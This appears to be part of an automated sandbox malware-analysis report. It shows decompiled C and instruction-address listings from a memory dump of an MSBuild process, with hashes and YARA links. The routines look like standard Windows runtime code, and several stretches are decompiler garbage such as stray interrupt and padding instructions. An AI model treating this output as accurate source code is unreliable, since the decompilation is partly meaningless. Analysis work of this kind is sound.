									if(__eax == 0) {
										__eax = E010BEB70(__ecx, 0x11979a0);
										__eax = _v52;
										L36:
										_pop(_t319);
										_pop(_t327);
										__eflags = _v8 ^ _t331;
										_pop(_t279);
										return E010EB640(_t209, _t279, _v8 ^ _t331, _t307, _t319, _t327);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t274 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t276 = E010D2E3E(_t274,  &_v36);
									_t287 = _v36;
									_v76 = _t276;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t278 = _t278 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x1195764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1198478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1198478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1196e58 & 0x0000ffff;
								__eax = ( *0x1196e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t318 = _t318 + 1;
								if(_t318 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t292 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("daa");
					_t237 = (_t234 | 0x0d286601) + _t334 | 0x0d262e01;
					 *((intOrPtr*)(_t325 + 0x28)) =  *((intOrPtr*)(_t325 + 0x28)) + _t237;
					 *_t320 =  *_t320 + _t278;
					asm("adc [ecx], eax");
					 *0x115b3501 =  *0x115b3501 - _t292;
					 *_t307 =  *_t307 + _t334;
					 *0xd288001 =  *0xd288001 - _t292;
					_t328 = _t325 + _t325;
					asm("daa");
					 *((intOrPtr*)(_t325 + _t325 + 0x28)) =  *((intOrPtr*)(_t325 + _t325 + 0x28)) + _t292;
					_pop(_t283);
					asm("adc [ecx], eax");
					_t337 = (_t237 | 0x0d260501) + _t292;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x117ff00);
					E010FD08C(_t283, _t320, _t328);
					_v44 =  *[fs:0x18];
					_t321 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t329 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t297 = _t249 * 0xc;
							_v48 = _t297;
							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x1081664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E010EE5C0(_a8,  *((intOrPtr*)(_t297 + 0x1081668)), _t284);
									_t337 = _t337 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
										_t329 = E011251BE(_t284,  *((intOrPtr*)(_v48 + 0x108166c)), _a16, _t321, _t329, __eflags, _a20, _a24);
										_v52 = _t329;
										break;
									} else {
										_t249 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t329;
						__eflags = _t329;
						if(_t329 < 0) {
							__eflags = _t329 - 0xc0000100;
							if(_t329 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t321;
									if( *_t293 == _t321) {
										_t329 = 0xc0000100;
										goto L76;
									} else {
										_t309 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t309 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t293) {
											__eflags =  *(_t309 + 0x1c);
											if( *(_t309 + 0x1c) == 0) {
												L106:
												_t329 = E010D2AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t329;
												__eflags = _t329 - 0xc0000100;
												if(_t329 != 0xc0000100) {
													goto L69;
												} else {
													_t321 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t254 = E010B6600( *(_t309 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t329 = E010D2C50(_t293, _a8, _t284, _a16, _a20, _a24, _t321);
											L76:
											_v32 = _t329;
											goto L69;
										}
									}
									goto L108;
								} else {
									E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t329 = _a24;
									_t261 = E010D2AE4( &_v36, _a8, _t284, _a16, _a20, _t329);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
										_v32 = E010D2C50(_v36, _a8, _t284, _a16, _a20, _t329, 1);
									}
									_v8 = _t321;
									E010D2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t247 = _t329;
					}
					L70:
					return E010FD0D1(_t247);
				}
				L108:
			}



















































                                                                                                0x010d2584
                                                                                                0x010d2586
                                                                                                0x010d2590
                                                                                                0x010d2596
                                                                                                0x010d2597
                                                                                                0x010d2598
                                                                                                0x010d2599
                                                                                                0x010d259e
                                                                                                0x010d25a4
                                                                                                0x010d25a9
                                                                                                0x010d25ac
                                                                                                0x010d25ae
                                                                                                0x010d25b1
                                                                                                0x010d25b2
                                                                                                0x010d25b5
                                                                                                0x010d25b8
                                                                                                0x010d25bb
                                                                                                0x010d25bc
                                                                                                0x010d25bf
                                                                                                0x010d25c2
                                                                                                0x010d25c5
                                                                                                0x010d25c6
                                                                                                0x010d25cb
                                                                                                0x010d25ce
                                                                                                0x010d25d8
                                                                                                0x010d25dd
                                                                                                0x010d25de
                                                                                                0x010d25e1
                                                                                                0x010d25e3
                                                                                                0x010d25e9
                                                                                                0x010d26da
                                                                                                0x010d26da
                                                                                                0x010d26dd
                                                                                                0x010d26e2
                                                                                                0x01115b56
                                                                                                0x00000000
                                                                                                0x010d26e8
                                                                                                0x010d26f9
                                                                                                0x010d26fb
                                                                                                0x010d26fe
                                                                                                0x010d2700
                                                                                                0x01115b60
                                                                                                0x00000000
                                                                                                0x010d2706
                                                                                                0x010d2706
                                                                                                0x010d270a
                                                                                                0x010d270a
                                                                                                0x010d270d
                                                                                                0x010d2713
                                                                                                0x010d2716
                                                                                                0x010d2718
                                                                                                0x010d271c
                                                                                                0x010d271e
                                                                                                0x01115b6c
                                                                                                0x01115b6f
                                                                                                0x01115b7f
                                                                                                0x01115b89
                                                                                                0x01115b8e
                                                                                                0x01115b93
                                                                                                0x01115b96
                                                                                                0x01115b9c
                                                                                                0x01115ba0
                                                                                                0x01115ba3
                                                                                                0x01115bab
                                                                                                0x01115bb0
                                                                                                0x01115bb3
                                                                                                0x01115bb3
                                                                                                0x01115ba3
                                                                                                0x010d2724
                                                                                                0x010d2726
                                                                                                0x010d2729
                                                                                                0x010d272c
                                                                                                0x010d279d
                                                                                                0x010d279d
                                                                                                0x010d27a0
                                                                                                0x010d27a2
                                                                                                0x00000000
                                                                                                0x010d272e
                                                                                                0x010d272e
                                                                                                0x010d2731
                                                                                                0x010d2734
                                                                                                0x010d2734
                                                                                                0x010d2736
                                                                                                0x01115bc1
                                                                                                0x01115bc1
                                                                                                0x01115bc4
                                                                                                0x00000000
                                                                                                0x01115bca
                                                                                                0x01115bca
                                                                                                0x01115bcd
                                                                                                0x00000000
                                                                                                0x01115bd3
                                                                                                0x00000000
                                                                                                0x01115bd3
                                                                                                0x01115bcd
                                                                                                0x010d273c
                                                                                                0x010d273c
                                                                                                0x010d2742
                                                                                                0x010d2747
                                                                                                0x010d274a
                                                                                                0x010d274d
                                                                                                0x010d2750
                                                                                                0x00000000
                                                                                                0x010d2756
                                                                                                0x010d2756
                                                                                                0x00000000
                                                                                                0x010d2902
                                                                                                0x010d2908
                                                                                                0x010d290b
                                                                                                0x00000000
                                                                                                0x010d2911
                                                                                                0x010d291c
                                                                                                0x010d2921
                                                                                                0x00000000
                                                                                                0x010d2921
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2880
                                                                                                0x010d2887
                                                                                                0x010d288c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2805
                                                                                                0x010d280a
                                                                                                0x010d2814
                                                                                                0x010d2816
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d281e
                                                                                                0x010d2821
                                                                                                0x010d2823
                                                                                                0x00000000
                                                                                                0x010d2829
                                                                                                0x010d2829
                                                                                                0x010d2831
                                                                                                0x010d283c
                                                                                                0x010d283e
                                                                                                0x00000000
                                                                                                0x010d283e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d284e
                                                                                                0x010d2850
                                                                                                0x010d2851
                                                                                                0x010d2854
                                                                                                0x010d2857
                                                                                                0x010d285a
                                                                                                0x010d285c
                                                                                                0x010d285d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d275d
                                                                                                0x010d2761
                                                                                                0x00000000
                                                                                                0x010d2767
                                                                                                0x010d276e
                                                                                                0x010d2773
                                                                                                0x010d2773
                                                                                                0x010d2776
                                                                                                0x010d2778
                                                                                                0x010d277e
                                                                                                0x010d277e
                                                                                                0x010d2781
                                                                                                0x010d2781
                                                                                                0x010d2783
                                                                                                0x010d2784
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115bd8
                                                                                                0x01115bde
                                                                                                0x01115be4
                                                                                                0x01115be6
                                                                                                0x01115be8
                                                                                                0x01115be9
                                                                                                0x01115bee
                                                                                                0x01115bf8
                                                                                                0x01115bff
                                                                                                0x01115c01
                                                                                                0x01115c04
                                                                                                0x01115c07
                                                                                                0x01115c0b
                                                                                                0x01115c0d
                                                                                                0x01115c0d
                                                                                                0x01115c15
                                                                                                0x01115c18
                                                                                                0x01115c1b
                                                                                                0x01115c1b
                                                                                                0x01115c1e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d28c3
                                                                                                0x010d28c8
                                                                                                0x010d28d2
                                                                                                0x010d28d4
                                                                                                0x010d28d8
                                                                                                0x010d28db
                                                                                                0x01115c26
                                                                                                0x01115c28
                                                                                                0x01115c2d
                                                                                                0x01115c2d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115c34
                                                                                                0x01115c36
                                                                                                0x01115c49
                                                                                                0x01115c4e
                                                                                                0x01115c54
                                                                                                0x01115c5b
                                                                                                0x01115c5d
                                                                                                0x01115c60
                                                                                                0x010d2788
                                                                                                0x010d2788
                                                                                                0x010d278b
                                                                                                0x010d278e
                                                                                                0x010d278e
                                                                                                0x010d278e
                                                                                                0x010d2791
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2756
                                                                                                0x010d2750
                                                                                                0x00000000
                                                                                                0x010d2794
                                                                                                0x010d2794
                                                                                                0x010d2795
                                                                                                0x010d2798
                                                                                                0x010d2798
                                                                                                0x00000000
                                                                                                0x010d2734
                                                                                                0x010d272c
                                                                                                0x010d2700
                                                                                                0x010d25ef
                                                                                                0x010d25ef
                                                                                                0x010d25ef
                                                                                                0x010d25f2
                                                                                                0x010d25f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d25fe
                                                                                                0x00000000
                                                                                                0x010d28e6
                                                                                                0x010d28ec
                                                                                                0x010d28ef
                                                                                                0x010d28f5
                                                                                                0x010d28f8
                                                                                                0x010d28f8
                                                                                                0x00000000
                                                                                                0x010d28f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2866
                                                                                                0x010d2866
                                                                                                0x010d2876
                                                                                                0x010d2879
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d27e0
                                                                                                0x010d27e7
                                                                                                0x010d27e9
                                                                                                0x010d27eb
                                                                                                0x01115afd
                                                                                                0x00000000
                                                                                                0x01115afd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2633
                                                                                                0x010d2638
                                                                                                0x010d263b
                                                                                                0x010d263c
                                                                                                0x010d263e
                                                                                                0x010d2640
                                                                                                0x010d2642
                                                                                                0x010d2647
                                                                                                0x010d2649
                                                                                                0x010d264e
                                                                                                0x010d2650
                                                                                                0x010d2653
                                                                                                0x010d2659
                                                                                                0x010d26a2
                                                                                                0x010d26a7
                                                                                                0x010d26ac
                                                                                                0x010d26b2
                                                                                                0x01115b11
                                                                                                0x01115b15
                                                                                                0x01115b17
                                                                                                0x00000000
                                                                                                0x010d26b8
                                                                                                0x010d26b8
                                                                                                0x010d26ba
                                                                                                0x010d27a6
                                                                                                0x010d27a6
                                                                                                0x010d27a9
                                                                                                0x010d27ab
                                                                                                0x010d27b9
                                                                                                0x010d27b9
                                                                                                0x010d27be
                                                                                                0x010d27c1
                                                                                                0x010d27c3
                                                                                                0x010d27c5
                                                                                                0x010d27c7
                                                                                                0x01115c74
                                                                                                0x01115c79
                                                                                                0x01115c79
                                                                                                0x010d27c7
                                                                                                0x00000000
                                                                                                0x010d26c0
                                                                                                0x010d26c0
                                                                                                0x010d26c3
                                                                                                0x010d26c6
                                                                                                0x010d26c6
                                                                                                0x010d26c9
                                                                                                0x010d26c9
                                                                                                0x00000000
                                                                                                0x010d26c9
                                                                                                0x010d26ba
                                                                                                0x010d265b
                                                                                                0x010d265b
                                                                                                0x010d265e
                                                                                                0x010d2667
                                                                                                0x010d266d
                                                                                                0x010d2677
                                                                                                0x010d267c
                                                                                                0x010d267f
                                                                                                0x010d2681
                                                                                                0x01115b49
                                                                                                0x01115b4e
                                                                                                0x010d27cd
                                                                                                0x010d27d0
                                                                                                0x010d27d1
                                                                                                0x010d27d2
                                                                                                0x010d27d4
                                                                                                0x010d27dd
                                                                                                0x010d2687
                                                                                                0x010d2687
                                                                                                0x010d268a
                                                                                                0x010d268b
                                                                                                0x010d268e
                                                                                                0x010d268f
                                                                                                0x010d2691
                                                                                                0x010d2696
                                                                                                0x010d2698
                                                                                                0x010d269d
                                                                                                0x010d269f
                                                                                                0x00000000
                                                                                                0x010d269f
                                                                                                0x010d2681
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2846
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2605
                                                                                                0x010d260a
                                                                                                0x010d260c
                                                                                                0x010d2611
                                                                                                0x010d2616
                                                                                                0x010d2619
                                                                                                0x010d2619
                                                                                                0x010d261e
                                                                                                0x00000000
                                                                                                0x010d2624
                                                                                                0x010d2627
                                                                                                0x010d2627
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115b1f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2894
                                                                                                0x010d289b
                                                                                                0x010d289d
                                                                                                0x010d28a1
                                                                                                0x01115b2b
                                                                                                0x01115b2e
                                                                                                0x01115b2e
                                                                                                0x010d28a7
                                                                                                0x010d28a9
                                                                                                0x01115b04
                                                                                                0x01115b09
                                                                                                0x01115b09
                                                                                                0x01115b09
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01115b35
                                                                                                0x01115b3c
                                                                                                0x010d28fb
                                                                                                0x010d28fb
                                                                                                0x010d26cc
                                                                                                0x010d26cc
                                                                                                0x010d26d0
                                                                                                0x00000000
                                                                                                0x010d26d2
                                                                                                0x010d26d2
                                                                                                0x00000000
                                                                                                0x010d26d2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d25fe
                                                                                                0x010d292d
                                                                                                0x010d292f
                                                                                                0x010d2930
                                                                                                0x010d2935
                                                                                                0x010d293e
                                                                                                0x010d293f
                                                                                                0x010d2944
                                                                                                0x010d294c
                                                                                                0x010d294f
                                                                                                0x010d2952
                                                                                                0x010d2958
                                                                                                0x010d295a
                                                                                                0x010d2960
                                                                                                0x010d2962
                                                                                                0x010d2968
                                                                                                0x010d2972
                                                                                                0x010d2973
                                                                                                0x010d297c
                                                                                                0x010d297e
                                                                                                0x010d297f
                                                                                                0x010d2980
                                                                                                0x010d2981
                                                                                                0x010d2982
                                                                                                0x010d2983
                                                                                                0x010d2984
                                                                                                0x010d2985
                                                                                                0x010d2986
                                                                                                0x010d2987
                                                                                                0x010d2988
                                                                                                0x010d2989
                                                                                                0x010d298a
                                                                                                0x010d298b
                                                                                                0x010d298c
                                                                                                0x010d298d
                                                                                                0x010d298e
                                                                                                0x010d298f
                                                                                                0x010d2990
                                                                                                0x010d2992
                                                                                                0x010d2997
                                                                                                0x010d29a3
                                                                                                0x010d29a6
                                                                                                0x010d29ab
                                                                                                0x010d29ad
                                                                                                0x010d29b0
                                                                                                0x010d29b2
                                                                                                0x01115c80
                                                                                                0x010d29b8
                                                                                                0x010d29b8
                                                                                                0x010d29bb
                                                                                                0x010d29c0
                                                                                                0x010d29c5
                                                                                                0x010d29c6
                                                                                                0x010d29c6
                                                                                                0x010d29c9
                                                                                                0x010d29cb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d29cd
                                                                                                0x010d29d0
                                                                                                0x010d29d9
                                                                                                0x010d29db
                                                                                                0x010d29dd
                                                                                                0x010d2a7f
                                                                                                0x010d2a84
                                                                                                0x010d2a87
                                                                                                0x010d2a89
                                                                                                0x01115ca1
                                                                                                0x01115ca3
                                                                                                0x00000000
                                                                                                0x010d2a8f
                                                                                                0x010d2a8f
                                                                                                0x00000000
                                                                                                0x010d2a8f
                                                                                                0x00000000
                                                                                                0x010d29e3
                                                                                                0x010d29e3
                                                                                                0x010d29e3
                                                                                                0x00000000
                                                                                                0x010d29e3
                                                                                                0x010d29dd
                                                                                                0x00000000
                                                                                                0x010d29db
                                                                                                0x010d29e6
                                                                                                0x010d29e9
                                                                                                0x010d29eb
                                                                                                0x010d29ed
                                                                                                0x010d29f3
                                                                                                0x010d29f5
                                                                                                0x010d29f8
                                                                                                0x010d29fa
                                                                                                0x010d2a97
                                                                                                0x010d2a9a
                                                                                                0x010d2a9d
                                                                                                0x010d2add
                                                                                                0x00000000
                                                                                                0x010d2a9f
                                                                                                0x010d2aa2
                                                                                                0x010d2aa5
                                                                                                0x010d2aa8
                                                                                                0x010d2aab
                                                                                                0x01115cab
                                                                                                0x01115caf
                                                                                                0x01115cc5
                                                                                                0x01115cda
                                                                                                0x01115cdc
                                                                                                0x01115cdf
                                                                                                0x01115ce5
                                                                                                0x00000000
                                                                                                0x01115ceb
                                                                                                0x01115ced
                                                                                                0x01115cee
                                                                                                0x00000000
                                                                                                0x01115cee
                                                                                                0x01115cb1
                                                                                                0x01115cb4
                                                                                                0x01115cb9
                                                                                                0x01115cbb
                                                                                                0x00000000
                                                                                                0x01115cbd
                                                                                                0x01115cbd
                                                                                                0x00000000
                                                                                                0x01115cbd
                                                                                                0x01115cbb
                                                                                                0x010d2ab1
                                                                                                0x010d2ab1
                                                                                                0x010d2ac4
                                                                                                0x010d2ac6
                                                                                                0x010d2ac6
                                                                                                0x00000000
                                                                                                0x010d2ac6
                                                                                                0x010d2aab
                                                                                                0x00000000
                                                                                                0x010d2a00
                                                                                                0x010d2a09
                                                                                                0x010d2a0e
                                                                                                0x010d2a21
                                                                                                0x010d2a24
                                                                                                0x010d2a35
                                                                                                0x010d2a3a
                                                                                                0x010d2a3d
                                                                                                0x010d2a42
                                                                                                0x010d2a59
                                                                                                0x010d2a59
                                                                                                0x010d2a5c
                                                                                                0x010d2a5f
                                                                                                0x010d2a5f
                                                                                                0x010d29fa
                                                                                                0x010d29f3
                                                                                                0x010d2a64
                                                                                                0x010d2a64
                                                                                                0x010d2a6b
                                                                                                0x010d2a6b
                                                                                                0x010d2a6d
                                                                                                0x010d2a72
                                                                                                0x010d2a72
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PATH
                                                                                                • API String ID: 0-1036084923
                                                                                                • Opcode ID: d0214ca0100b2fdaa5fb91171e37d7ae9554cf318d5970ae60b26d2e104adf08
                                                                                                • Instruction ID: 39d88a4f18a851da5ce5aff059e5c03c5c795fcdd44cd2136d0bf29e21dc516e
                                                                                                • Opcode Fuzzy Hash: d0214ca0100b2fdaa5fb91171e37d7ae9554cf318d5970ae60b26d2e104adf08
                                                                                                • Instruction Fuzzy Hash: A4C18D71E10319DBDB29DFA9D880BEEBBF1FF89700F054029E991AB250D734A941CB65
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010AC962 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 42%
                                                                                                			E010AC962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x119d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E010BEEF0(0x11970a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0112F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E010BEB70(_t29, 0x11970a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E010EB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0112F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x11970c0; // 0x0
					while(_t38 != 0x11970c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x119b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                0x010ac96a
                                                                                                0x010ac974
                                                                                                0x010ac988
                                                                                                0x010ac98a
                                                                                                0x01117c9d
                                                                                                0x01117c9f
                                                                                                0x01117ca4
                                                                                                0x01117cae
                                                                                                0x01117cf0
                                                                                                0x01117cf5
                                                                                                0x01117cfa
                                                                                                0x010ac992
                                                                                                0x010ac996
                                                                                                0x010ac997
                                                                                                0x010ac998
                                                                                                0x010ac9a3
                                                                                                0x010ac9a3
                                                                                                0x01117cb0
                                                                                                0x01117cb7
                                                                                                0x01117cbb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117cbd
                                                                                                0x01117ce8
                                                                                                0x01117cc5
                                                                                                0x01117cc8
                                                                                                0x01117cca
                                                                                                0x01117cd0
                                                                                                0x01117cd6
                                                                                                0x01117cde
                                                                                                0x01117ce4
                                                                                                0x01117ce4
                                                                                                0x01117cd0
                                                                                                0x00000000
                                                                                                0x01117ce8
                                                                                                0x010ac990
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b18893fcf5fcc18276f3ed840ec7e0ef1b997b43b548dc3263e8218d74052006
                                                                                                • Instruction ID: 512f92e7d8af5f908f85648b2816e21733a5aebec436b6ba53d041999cd93b8a
                                                                                                • Opcode Fuzzy Hash: b18893fcf5fcc18276f3ed840ec7e0ef1b997b43b548dc3263e8218d74052006
                                                                                                • Instruction Fuzzy Hash: 431102313106039BCB28AE28D885AABBBE1BF84610F040538E8A583694DB20EC60CBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E010DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E010BEEF0(0x1197b60);
					_t134 =  *0x1197b84; // 0x77e17b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1197b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1197b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E010B6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E010B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01148938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E010AB150();
													}
													_t116 = E01146D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E010B75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1198638; // 0x0
